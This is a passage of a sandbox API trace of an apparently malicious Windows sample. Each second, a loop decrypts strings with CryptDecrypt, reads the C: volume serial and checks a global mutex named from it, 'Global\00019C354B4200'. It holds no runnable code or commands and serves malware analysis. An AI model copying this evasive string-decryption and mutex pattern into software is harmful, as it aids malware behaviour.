dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32d28) returned 1 [0162.219] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0162.219] CryptDecrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0162.219] CryptDestroyKey (hKey=0xa32d28) returned 1 [0162.219] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0162.219] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0162.219] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0162.219] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32d28) returned 1 [0162.219] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0162.219] CryptDecrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0162.219] CryptDestroyKey (hKey=0xa32d28) returned 1 [0162.219] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0162.219] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0162.219] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0162.219] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0162.219] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0162.219] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0162.219] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0162.219] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32d28) returned 1 [0162.219] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0162.219] CryptDecrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0162.219] CryptDestroyKey (hKey=0xa32d28) returned 1 [0162.219] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0162.219] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x140 [0162.219] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x0) returned 0x102 [0162.219] CloseHandle (hObject=0x140) returned 1 [0162.219] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0162.219] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0162.220] Sleep (dwMilliseconds=0x3e8) [0163.231] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0163.231] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32ce8) returned 1 [0163.231] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0163.231] CryptDecrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0163.231] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0163.231] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0163.231] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0163.231] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0163.231] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32ce8) returned 1 [0163.231] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0163.231] CryptDecrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0163.231] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0163.231] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0163.231] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0163.231] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0163.231] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0163.231] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0163.232] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0163.232] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0163.232] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32ce8) returned 1 [0163.232] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0163.232] CryptDecrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0163.232] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0163.232] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0163.232] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x180 [0163.232] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0x0) returned 0x102 [0163.232] CloseHandle (hObject=0x180) returned 1 [0163.232] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0163.232] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0163.232] Sleep (dwMilliseconds=0x3e8) [0164.273] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0164.273] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32ca8) returned 1 [0164.273] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0164.273] CryptDecrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0164.273] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0164.273] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0164.273] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0164.273] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0164.273] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32ca8) returned 1 [0164.273] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0164.273] CryptDecrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0164.273] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0164.273] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0164.273] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0164.274] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0164.274] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0164.274] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0164.274] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0164.274] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0164.274] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32ca8) returned 1 [0164.274] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0164.274] CryptDecrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0164.274] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0164.274] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0164.274] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x188 [0164.274] WaitForSingleObject (hHandle=0x188, dwMilliseconds=0x0) returned 0x102 [0164.274] CloseHandle (hObject=0x188) returned 1 [0164.274] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0164.274] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0164.274] Sleep (dwMilliseconds=0x3e8) [0165.557] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0165.557] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32ca8) returned 1 [0165.557] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0165.557] CryptDecrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0165.557] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0165.557] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0165.557] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0165.557] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0165.557] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32ca8) returned 1 [0165.557] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0165.557] CryptDecrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0165.557] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0165.557] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0165.557] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0165.557] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0165.557] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0165.557] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0165.557] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0165.557] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0165.557] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32ca8) returned 1 [0165.557] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0165.557] CryptDecrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0165.557] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0165.557] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0165.557] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x148 [0165.557] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0x0) returned 0x102 [0165.557] CloseHandle (hObject=0x148) returned 1 [0165.557] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0165.557] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0165.558] Sleep (dwMilliseconds=0x3e8) [0166.573] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0166.573] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32c68) returned 1 [0166.573] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0166.573] CryptDecrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0166.573] CryptDestroyKey (hKey=0xa32c68) returned 1 [0166.573] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0166.573] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0166.573] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0166.573] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32c68) returned 1 [0166.573] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0166.573] CryptDecrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0166.573] CryptDestroyKey (hKey=0xa32c68) returned 1 [0166.574] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0166.574] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0166.574] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0166.574] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0166.574] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0166.574] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0166.574] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0166.574] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32c68) returned 1 [0166.574] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0166.574] CryptDecrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0166.574] CryptDestroyKey (hKey=0xa32c68) returned 1 [0166.574] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0166.574] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x190 [0166.574] WaitForSingleObject (hHandle=0x190, dwMilliseconds=0x0) returned 0x102 [0166.574] CloseHandle (hObject=0x190) returned 1 [0166.574] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0166.574] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0166.574] Sleep (dwMilliseconds=0x3e8) [0167.662] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0167.662] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32d28) returned 1 [0167.662] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0167.662] CryptDecrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0167.662] CryptDestroyKey (hKey=0xa32d28) returned 1 [0167.662] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0167.662] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0167.663] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0167.663] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32d28) returned 1 [0167.663] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0167.663] CryptDecrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0167.663] CryptDestroyKey (hKey=0xa32d28) returned 1 [0167.663] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0167.663] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0167.663] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0167.663] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0167.663] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0167.663] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0167.663] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0167.663] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32d28) returned 1 [0167.663] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0167.663] CryptDecrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0167.663] CryptDestroyKey (hKey=0xa32d28) returned 1 [0167.663] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0167.663] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x140 [0167.663] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x0) returned 0x102 [0167.663] CloseHandle (hObject=0x140) returned 1 [0167.663] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0167.663] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0167.663] Sleep (dwMilliseconds=0x3e8) [0168.675] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0168.675] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32c68) returned 1 [0168.675] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0168.675] CryptDecrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0168.675] CryptDestroyKey (hKey=0xa32c68) returned 1 [0168.675] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0168.675] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0168.675] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0168.675] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32c68) returned 1 [0168.675] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0168.675] CryptDecrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0168.675] CryptDestroyKey (hKey=0xa32c68) returned 1 [0168.675] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0168.675] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0168.675] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0168.675] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0168.675] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0168.676] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0168.676] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0168.676] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32c68) returned 1 [0168.676] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0168.676] CryptDecrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0168.676] CryptDestroyKey (hKey=0xa32c68) returned 1 [0168.676] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0168.676] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x180 [0168.676] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0x0) returned 0x102 [0168.676] CloseHandle (hObject=0x180) returned 1 [0168.676] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0168.676] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0168.676] Sleep (dwMilliseconds=0x3e8) [0169.689] 